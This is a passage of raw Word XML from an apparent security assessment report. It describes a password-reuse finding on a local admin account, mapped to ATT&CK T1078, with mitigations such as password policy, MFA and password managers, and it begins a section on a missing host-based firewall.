            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="5540F140" w:rsidP="0D325B6E" w:rsidRDefault="5540F140" w14:paraId="241F104F" w14:textId="65F6D891">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="Rfbd2d93eae8d4d76">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="5540F140">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T1078</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="059E2AF5">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5540F140">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Valid Accounts</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="21794877">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2A58576"/>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4E52C08" w:rsidP="0D325B6E" w:rsidRDefault="64E52C08" w14:paraId="211D5357" w14:textId="39C988FC">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64E52C0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A403C0E" w:rsidP="0D325B6E" w:rsidRDefault="1A403C0E" w14:paraId="64BC6482" w14:textId="24E09FDD">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892b85e25ca943b8">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="1A403C0E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1027: Password Policies</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w:rsidR="2338EF2E" w:rsidP="0D325B6E" w:rsidRDefault="2338EF2E" w14:paraId="4576D4E6" w14:textId="65A95AE8">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7862bce348ef43f7">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="2338EF2E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>M1032: Multi-Factor Authentication</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="724C2A7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06BEB69" w:rsidP="0D325B6E" w:rsidRDefault="406BEB69" w14:paraId="01D85E18" w14:textId="661A0F79">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406BEB69">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79EB859" w14:textId="3B79601C">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DD24A59" w14:textId="7B21EECB">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1451F3D6" w:rsidP="0D325B6E" w:rsidRDefault="1451F3D6" w14:paraId="4B943323" w14:textId="705A71C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51F3D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451F3D6" w:rsidP="0D325B6E" w:rsidRDefault="1451F3D6" w14:paraId="53A736A6" w14:textId="2E4DDB4C">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6"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1451F3D6">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The </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1451F3D6">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affected host's admin local user account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1451F3D6">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was found to be using </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42513117">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the same password across multiple services</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="534B4340">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and machines</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4251311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including </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42513117">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service 1 and service 2</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="42513117">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:strike w:val="0"/>
          <w:dstrike w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="7C880822" w14:textId="1078D7C9">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3B1CA829" w:rsidP="0D325B6E" w:rsidRDefault="3B1CA829" w14:paraId="45BFA152" w14:textId="65E9C382">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3B1CA82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B414EFB" w:rsidP="0D325B6E" w:rsidRDefault="0B414EFB" w14:paraId="6121879C" w14:textId="4E9EE10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414EFB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Having login access to the </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3A7A200A">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affected host's admin local user account</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="3A7A200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1BF4C8A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>allows the</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="00F5259A">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w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="41BF4C8A">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4D1B29F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">have </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D1B29F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>administrator</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="4D1B29F3">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> privileges on affected hosts, giving them access to private custo</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="47F2E0DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">mer and business data, as well as </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="47F2E0DB">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47F2E0DB">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and take down company services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="24A1CCDA" w14:textId="4290BA4B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="1451F3D6" w:rsidP="0D325B6E" w:rsidRDefault="1451F3D6" w14:paraId="4DD63AAA" w14:textId="3771663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51F3D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3F241AC0" w14:textId="78A8CC4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55C10042" w14:textId="46C579E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451F3D6" w:rsidP="0D325B6E" w:rsidRDefault="1451F3D6" w14:paraId="34DC19A1" w14:textId="1E0ADF6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51F3D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B17A282" w:rsidP="0D325B6E" w:rsidRDefault="1B17A282" w14:paraId="19FF75FA" w14:textId="10161484">
      <w:p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17A28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B17A28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99D9897" w:rsidP="0D325B6E" w:rsidRDefault="499D9897" w14:paraId="7B4C790E" w14:textId="32EE458B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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99D989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strong password policy that prohibits </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="5DAAD0A7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>reused passwords</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="499D9897">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> across multiple accounts or services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="749EE50E" w:rsidP="0D325B6E" w:rsidRDefault="749EE50E" w14:paraId="77DDAAB8" w14:textId="29746E2C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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Implement multi-factor authentication to prevent access even with reused passwor</w:t>
      </w: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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="749EE50E" w:rsidP="0D325B6E" w:rsidRDefault="749EE50E" w14:paraId="4CBA09E3" w14:textId="79B905C4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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 xml:space="preserve">Utilize a password manager to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73525DBD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>encourag</w:t>
      </w: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 xml:space="preserve">e employees to </w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="53242388">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>avoid reusing</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="749EE50E">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passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="78DB7A60" w:rsidP="0D325B6E" w:rsidRDefault="78DB7A60" w14:paraId="57C55E88" w14:textId="0A3156C5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>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8DB7A60">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Train all users on the risk of password reuse</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="1989E8A9">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20064D20" w14:textId="2BF6FA42">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:suppressLineNumbers w:val="0"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="16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1451F3D6" w:rsidP="0D325B6E" w:rsidRDefault="1451F3D6" w14:paraId="2331DDC5" w14:textId="3E0228E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51F3D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59D9440" w:rsidP="0D325B6E" w:rsidRDefault="459D9440" w14:paraId="21607B66" w14:textId="7E1D4163">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R569c771aed3845f3">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="459D9440">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>CISA - Password Manager Guidline</w:t>
        </w:r>
        <w:r w:rsidRPr="0D325B6E" w:rsidR="4F56B605">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>s</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="1C4463EE" w:rsidP="0D325B6E" w:rsidRDefault="1C4463EE" w14:paraId="2E6ABCDA" w14:textId="746174AE">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R4dac82af6b074811">
        <w:r w:rsidRPr="0D325B6E" w:rsidR="1C4463EE">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:b w:val="0"/>
            <w:bCs w:val="0"/>
            <w:i w:val="0"/>
            <w:iCs w:val="0"/>
            <w:caps w:val="0"/>
            <w:smallCaps w:val="0"/>
            <w:noProof w:val="0"/>
            <w:color w:val="0070C0"/>
            <w:sz w:val="26"/>
            <w:szCs w:val="26"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>Palo Alto Networks - Multi Factor Authentication</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidP="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="447EF09E" w14:textId="6C4067A0">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0D325B6E" w:rsidRDefault="0D325B6E" w14:paraId="67037EA3" w14:textId="0C5F8B64">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="73E8C7F2" w:rsidP="0D325B6E" w:rsidRDefault="73E8C7F2" w14:paraId="71A40F7E" w14:textId="31982D88">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:eastAsia="Aptos" w:cs="Aptos"/>
          <w:noProof w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:name="_Toc1834096858" w:id="235454776"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73E8C7F2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:color w:val="660000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>▌</w:t>
      </w:r>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="73E8C7F2">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C1:</w:t>
      </w:r>
      <w:bookmarkStart w:name="_Toc405124281" w:id="1832344722"/>
      <w:bookmarkStart w:name="_Toc1256418005" w:id="1396236753"/>
      <w:bookmarkStart w:name="_Toc1227743754" w:id="818944210"/>
      <w:bookmarkStart w:name="_Toc1809862555" w:id="1847741533"/>
      <w:bookmarkStart w:name="_Toc452205927" w:id="1111352209"/>
      <w:bookmarkStart w:name="_Toc2117672404" w:id="1743381767"/>
      <w:bookmarkStart w:name="_Toc355306443" w:id="1415918846"/>
      <w:bookmarkStart w:name="_Toc586070439" w:id="58185848"/>
      <w:r w:rsidRPr="0D325B6E" w:rsidR="0312474B">
        <w:rPr>
          <w:noProof w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lack of Host-Based Firewall</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1743381767"/>
      <w:bookmarkEnd w:id="1415918846"/>
      <w:bookmarkEnd w:id="58185848"/>
      <w:bookmarkEnd w:id="1832344722"/>
      <w:bookmarkEnd w:id="1396236753"/>
      <w:bookmarkEnd w:id="818944210"/>
      <w:bookmarkEnd w:id="1847741533"/>
      <w:bookmarkEnd w:id="1111352209"/>
      <w:bookmarkEnd w:id="235454776"/>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6FD9756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C80713" w14:textId="5B76AE2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85DEBD" w14:textId="505C153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0942A65" w14:textId="4159CE9F">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24FFCB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D74184" w14:textId="10D8C1F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0F3A9A3" w14:textId="07C86260">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7E0C039" w:rsidP="0D325B6E" w:rsidRDefault="67E0C039" w14:paraId="5BCCACF2" w14:textId="6765CFEF">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67E0C039">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="1"/>
                <w:bCs w:val="1"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="FFFFFF" w:themeColor="background1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="60"/>
                <w:szCs w:val="60"/>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9D3620D" w14:textId="10CEA0A9">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028DC22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0507F1" w14:textId="79837D6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7F7D01D" w14:textId="208B5DD6">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43F8C6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23B3850"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7B1A974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BC3D84" w14:textId="74D95334">
            <w:pPr>
              <w:spacing w:after="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w:t>
            </w:r>
            <w:r w:rsidRPr="0D325B6E" w:rsidR="1B05AA28">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:caps w:val="0"/>
                <w:smallCaps w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>v4.0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7161A4D" w:rsidP="0D325B6E" w:rsidRDefault="17161A4D" w14:paraId="2299C9F0" w14:textId="396A61FD">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:spacing w:after="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r w:rsidRPr="0D325B6E" w:rsidR="17161A4D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:i w:val="0"/>
                <w:iCs w:val="0"/>
                <w:strike w:val="0"/>
                <w:dstrike w:val="0"/>
                <w:noProof w:val="0"/>
                <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:u w:val="none"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0D325B6E" w:rsidTr="0D325B6E" w14:paraId="7A5DBF7B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3180" w:type="dxa"/>
            <w:gridSpan w:val="2"/>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DE5EEB" w14:textId="4FBAF6A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84281F9" w14:textId="6395E0F3">
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                <w:noProof w:val="0"/>
                <w:color w:val="0070C0"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="R951735d4bc074c1c">
              <w:r w:rsidRPr="0D325B6E" w:rsidR="0D325B6E">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
                  <w:b w:val="0"/>
                  <w:bCs w:val="0"/>
                  <w:i w:val="0"/>
                  <w:iCs w:val="0"/>
                  <w:strike w:val="0"/>
                  <w:dstrike w:val="0"/>
                  <w:noProof w:val="0"/>
                  <w:color w:val="0070C0"/>
                  <w:sz w:val="22"/>
                  <w:szCs w:val="22"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>T</w:t>
              </w:r>
              <w:r w:rsidRPr="0D325B6E" w:rsidR="7CFC3537">
                <w:rPr>
